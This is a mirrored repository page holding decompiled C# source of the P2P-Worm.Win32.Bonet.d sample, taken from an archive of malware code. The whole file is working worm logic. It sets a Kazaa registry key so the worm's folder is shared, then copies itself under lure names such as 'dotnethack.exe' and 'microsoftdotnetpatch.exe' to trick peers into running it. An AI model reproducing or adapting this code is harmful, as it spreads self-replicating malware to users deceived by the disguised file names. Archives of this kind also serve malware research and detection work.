mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
f2ac1ece55
add
40 lines
1.1 KiB
C#
40 lines
1.1 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: p2pdotnet
|
|
// Assembly: p2p, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 9E3614D0-FB94-4D7E-AEE9-6FE0A654E1F0
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43.exe
|
|
|
|
using Microsoft.Win32;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
|
|
internal class p2pdotnet
|
|
{
|
|
public static void Main()
|
|
{
|
|
Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory()));
|
|
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
|
|
string[] strArray = new string[8]
|
|
{
|
|
"dotnethack.exe",
|
|
"xboxdotnetemulator.exe",
|
|
"linuxdotnet.exe",
|
|
"dosdotnet.exe",
|
|
"microsoftdotnetpatch.exe",
|
|
"sha1.exe",
|
|
"tripleDES.exe",
|
|
"c#tutorials.exe"
|
|
};
|
|
foreach (string destFileName in strArray)
|
|
{
|
|
try
|
|
{
|
|
File.Copy(module.FullyQualifiedName, destFileName);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
}
|
|
}
|